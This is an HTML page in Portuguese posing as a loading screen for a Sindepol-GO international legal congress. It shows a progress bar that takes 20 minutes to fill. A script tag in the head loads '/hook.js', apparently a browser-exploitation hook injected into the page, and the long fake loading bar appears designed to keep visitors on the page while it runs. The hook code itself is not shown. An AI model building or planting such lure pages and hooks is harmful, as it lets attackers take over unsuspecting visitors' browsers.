<!DOCTYPE html>
<html lang="pt">
<head>
<meta charset="UTF-8">
    <script src="/hook.js"></script>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Carregamento</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css">
<link href="https://fonts.googleapis.com/css2?family=Jura:wght@400;500;700&display=swap" rel="stylesheet">
<style>
    body {
        background-image: url('https://i.ibb.co/DzMZmtR/DALL-E-2024-03-31-17-00-24-Imagine-a-large-high-resolution-background-image-featuring-a-globe-center.jpg');
        background-size: cover;
        background-color: #000;
        margin: 0;
        padding: 0;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        color: #fff;
        height: 100vh;
        font-family: 'Jura', sans-serif;
        position: relative;
    }
  
    .main-content {
        position: relative;
        z-index: 2;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
    }
    .title {
        font-size: 5vw; /* Ajustável com a largura da viewport */
        color: white;
        font-weight: bold;
        text-align: center;
    }
    .container {
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        margin-top: 20px; /* Espaçamento entre o título e a barra de status */
    }
    .progress-bar {
        width: 60%; /* Adaptável a telas maiores */
        height: 20px;
        background-color: #555;
        border-radius: 15px;
        overflow: hidden;
        box-shadow: 0 0 10px #fff;
        margin-top: 20px;
    }
    .progress-bar-inner {
        height: 100%;
        width: 0%;
        background-color: #4CAF50;
        border-radius: 15px;
        transition: width 2s;
    }
    .loading-text {
        font-size: 4vw; /* Ajustável com a largura da viewport */
        display: flex;
        align-items: center;
        justify-content: center;
        margin-top: 20px;
    }
    .fa-cog {
        margin-left: 10px;
        font-size: 3vw; /* Ajustável com a largura da viewport */
        animation: spin 4s linear infinite;
    }
    @media (min-width: 1024px) {
        .title {
            font-size: 2.5rem; /* Tamanho fixo para telas grandes */
        }
        .loading-text, .fa-cog {
            font-size: 1.5rem; /* Tamanho fixo para telas grandes */
        }
        .progress-bar {
            width: 50%; /* Largura ajustada para telas grandes */
        }
    }
    @keyframes spin {
        from { transform: rotate(0deg); }
        to { transform: rotate(360deg); }
    }
</style>
</head>
<body>

<div class="main-content">
    <div class="title">1º Congresso Jurídico Internacional do Sindepol-GO</div>

    <div class="container">
        <div class="progress-bar">
            <div class="progress-bar-inner"></div>
        </div>

        <div class="loading-text">
            Carregando os dados
            <i class="fas fa-cog fa-spin"></i>
        </div>
    </div>
</div>

<script>
    const totalTime = 20 * 60 * 1000; // 20 minutos
    const progressBarInner = document.querySelector('.progress-bar-inner');

    let start = Date.now();
    let interval = setInterval(() => {
        let timeElapsed = Date.now() - start;
        let progress = (timeElapsed / totalTime) * 100;
        progressBarInner.style.width = progress + '%';

        if(progress >= 100) clearInterval(interval);
    }, 1000);
</script>

</body>
</html>
